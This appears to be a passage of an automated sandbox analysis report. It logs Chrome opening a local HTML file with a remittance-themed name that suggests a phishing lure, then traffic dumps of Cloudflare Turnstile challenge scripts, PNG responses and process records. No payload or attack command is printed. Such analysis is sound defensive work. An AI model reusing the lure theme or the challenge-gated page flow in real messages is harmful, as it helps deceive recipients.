                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                                                                    Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                                                                    2024-12-19 16:51:19 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                                                                    Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549738104.18.94.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:20 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48e58af95843fa&lang=auto HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:20 UTC331INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:20 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 114090
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e595b9c080d9-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:20 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30
                                                                    Data Ascii: turnstile_refresh":"Refresh","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_overrun_description":"Stuck%20here%3F","testing_only":"Testing%20only.","not_embedded":"This%20challenge%20must%20be%20embedded%20
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 2c 66 4b 2c 66 4c 2c 66 4d 2c 66 57 2c 67 37 2c 67 62 2c 67 65 2c 67 66 2c 67 63 2c 67 64 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 30 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 30 33 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 31 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 32 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 37 35 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 37 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 37 30 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                    Data Ascii: ,fK,fL,fM,fW,g7,gb,ge,gf,gc,gd){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(970))/1+parseInt(gI(1503))/2*(-parseInt(gI(881))/3)+-parseInt(gI(932))/4+parseInt(gI(1275))/5+-parseInt(gI(1377))/6*(parseInt(gI(470))/7)+parseInt(gI(
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 35 30 34 29 2c 6f 5b 67 4e 28 36 36 39 29 5d 28 69 2c 44 29 29 3f 6f 5b 67 4e 28 31 33 38 32 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 69 2b 44 2c 68 5b 44 5d 29 29 3a 6f 5b 67 4e 28 31 32 39 37 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 69 66 28 67 4f 3d 67 4e 2c 6f 5b 67 4f 28 31 31 33 39 29 5d 28 6f 5b 67 4f 28 31 30 38 30 29 5d 2c 67 4f 28 39 34 34 29 29 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 4f 62 6a 65 63 74 5b 67 4f 28 38 34 36 29 5d 5b 67 4f 28 31 30 36 34 29 5d 5b 67 4f 28 31 34 38 30 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 4f 28 31 30 39 31 29 5d 28 47 29 7d 7d 2c 65 54 3d 67 4a 28 31 36 32 31 29 5b 67 4a 28 33
                                                                    Data Ascii: 504),o[gN(669)](i,D))?o[gN(1382)](s,i+D,E):F||s(i+D,h[D])):o[gN(1297)](s,i+D,E),C++);return j;function s(G,H,gO){if(gO=gN,o[gO(1139)](o[gO(1080)],gO(944)))return;else Object[gO(846)][gO(1064)][gO(1480)](j,H)||(j[H]=[]),j[H][gO(1091)](G)}},eT=gJ(1621)[gJ(3
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 27 4a 6e 4d 48 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 55 65 74 44 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6c 53 77 4a 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 71 64 73 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 42 49 46 68 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 52 52 76 5a 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 4b 72 5a 62 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 41 76 65 77 75 27 3a 66 75 6e 63 74 69
                                                                    Data Ascii: 'JnMHK':function(h,i){return h+i},'UetDJ':function(h,i){return h<i},'lSwJH':function(h,i){return h(i)},'AqdsS':function(h,i){return h|i},'BIFhH':function(h,i){return h==i},'RRvZb':function(h,i){return h<i},'KrZbl':function(h,i){return h<<i},'Avewu':functi
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 69 29 7d 2c 27 56 71 7a 7a 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 46 49 43 46 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 54 28 33 30 30 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 67 55 2c 69 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 67 55 3d 67 54 2c 69 3d 7b 27 4e 74 6d 61 7a 27 3a 67 55 28 38 30 38 29 2c 27 54 5a 79 46 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 2c 67 56 29 7b 72 65 74 75 72 6e 20 67 56 3d 67 55 2c 64 5b 67 56 28 39 39 37 29 5d 28 6a 2c 6b 29 7d 2c 27 4b 54 64 71 66 27 3a 66 75 6e 63 74 69 6f 6e 28 6a 2c 6b 29 7b 72 65 74 75 72 6e 20 6a 28 6b 29 7d 7d 2c 64 5b 67 55 28 38 30 37 29 5d 3d 3d
                                                                    Data Ascii: i)},'Vqzzj':function(h,i){return h!=i},'FICFm':function(h,i){return i===h}},e=String[gT(300)],f={'h':function(h,gU,i,k,l,m){if(gU=gT,i={'Ntmaz':gU(808),'TZyFp':function(j,k,gV){return gV=gU,d[gV(997)](j,k)},'KTdqf':function(j,k){return j(k)}},d[gU(807)]==
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 2d 31 29 3f 28 4a 3d 30 2c 48 5b 67 5a 28 31 30 39 31 29 5d 28 64 5b 67 5a 28 31 33 35 39 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 67 5a 28 39 34 35 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 67 5a 28 33 35 36 29 5d 28 49 3c 3c 31 2e 37 33 2c 64 5b 67 5a 28 31 33 33 30 29 5d 28 4e 2c 31 29 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 67 5a 28 31 30 39 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 67 5a 28 33 35 36 29 5d 28 49 3c 3c 31 2c 4e 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 67 5a 28 31 30 39 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30
                                                                    Data Ascii: -1)?(J=0,H[gZ(1091)](d[gZ(1359)](o,I)),I=0):J++,x++);for(N=D[gZ(945)](0),x=0;8>x;I=d[gZ(356)](I<<1.73,d[gZ(1330)](N,1)),j-1==J?(J=0,H[gZ(1091)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[gZ(356)](I<<1,N),J==j-1?(J=0,H[gZ(1091)](o(I)),I=0):J++,N=0
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 2e 68 5b 73 5b 67 5a 28 31 35 30 30 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 2c 73 5b 67 5a 28 31 32 30 32 29 5d 28 73 5b 67 5a 28 38 36 36 29 5d 28 73 5b 67 5a 28 31 30 30 34 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 5d 5b 31 5d 5b 67 5a 28 39 34 35 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 2e 35 37 5d 5b 30 5d 2b 2b 29 2c 37 37 29 2c 32 35 36 29 2c 32 35 35 29 29 5e 32 33 38 2c 52 3d 74 68 69 73 2e 68 5b 73 5b 67 5a 28 31 30 39 37 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 2e 32 36 5d 5b 33 5d 5e 73 5b 67 5a 28 31 33 35 32 29 5d 28 31 37 39 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 31 38 2e 38 38 5d 5b 31 5d 5b 67 5a 28 39 34 35 29 5d 28 74 68 69 73 2e 68 5b 31 38 5e 74 68 69 73 2e 67 5d 5b 30 5d
                                                                    Data Ascii: .h[s[gZ(1500)](18,this.g)][3],s[gZ(1202)](s[gZ(866)](s[gZ(1004)](this.h[this.g^18][1][gZ(945)](this.h[this.g^18.57][0]++),77),256),255))^238,R=this.h[s[gZ(1097)](this.h[this.g^18.26][3]^s[gZ(1352)](179+this.h[this.g^18.88][1][gZ(945)](this.h[18^this.g][0]
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 32 28 39 34 35 29 5d 28 74 68 69 73 2e 68 5b 31 38 2e 32 36 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 37 37 29 2c 32 35 36 29 26 32 35 35 2c 32 33 31 29 2c 52 3d 5b 6e 75 6c 6c 5d 2c 53 3d 30 3b 53 3c 51 3b 52 5b 68 32 28 31 30 39 31 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 32 28 31 34 32 35 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 32 28 37 30 37 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 64 5b 68 32 28 35 37 33 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 32 28 36 38 33 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 32 28 39 34 35 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 32 28 35 39 36 29 5d 28 31 38 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 37 37 2c 32 35 36 29 26 32 35 35 2e 38
                                                                    Data Ascii: )](18,this.g)][1][h2(945)](this.h[18.26^this.g][0]++),77),256)&255,231),R=[null],S=0;S<Q;R[h2(1091)](this.h[d[h2(1425)](this.h[d[h2(707)](18,this.g)][3]^d[h2(573)](this.h[d[h2(683)](18,this.g)][1][h2(945)](this.h[d[h2(596)](18,this.g)][0]++)-77,256)&255.8
                                                                    2024-12-19 16:51:20 UTC1369INData Raw: 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 68 32 28 31 33 36 31 29 5d 28 4d 2c 42 29 29 4d 3d 45 2b 45 5b 68 32 28 35 39 34 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 32 28 31 30 39 31 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 45 2b 4d 5b 68 32 28 35 39 34 29 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4d 2c 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 68 32 28 37 37 38 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 67 54 28 35 33 32 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 39 34 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 34 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 6e 29 7b 69 66 28 68 6e 3d 67 4a 2c 65 4d 5b 68 6e 28 39 34 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68
                                                                    Data Ascii: +),s[M])M=s[M];else if(d[h2(1361)](M,B))M=E+E[h2(594)](0);else return null;D[h2(1091)](M),s[B++]=E+M[h2(594)](0),x--,E=M,0==x&&(x=Math[h2(778)](2,C),C++)}}},g={},g[gT(532)]=f.h,g}(),eM[gJ(940)]=![],eM[gJ(488)]=function(hn){if(hn=gJ,eM[hn(940)])return;eM[h


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549739104.18.94.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:20 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/njfi6/0x4AAAAAAA0WiiyS1ss3H6RW/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:20 UTC240INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:20 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e596ca777cac-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549746104.18.95.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:22 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:22 UTC240INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:22 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e5a1499c8c60-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:11:50:55
                                                                    Start date:19/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT Remittance_(Dmorris)CQDM.html"
                                                                    Imagebase:0x7ff715980000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:2
                                                                    Start time:11:50:59
                                                                    Start date:19/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2008,i,15302390946126171392,15399631728845326187,262144 /prefetch:8
                                                                    Imagebase:0x7ff715980000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    No disassembly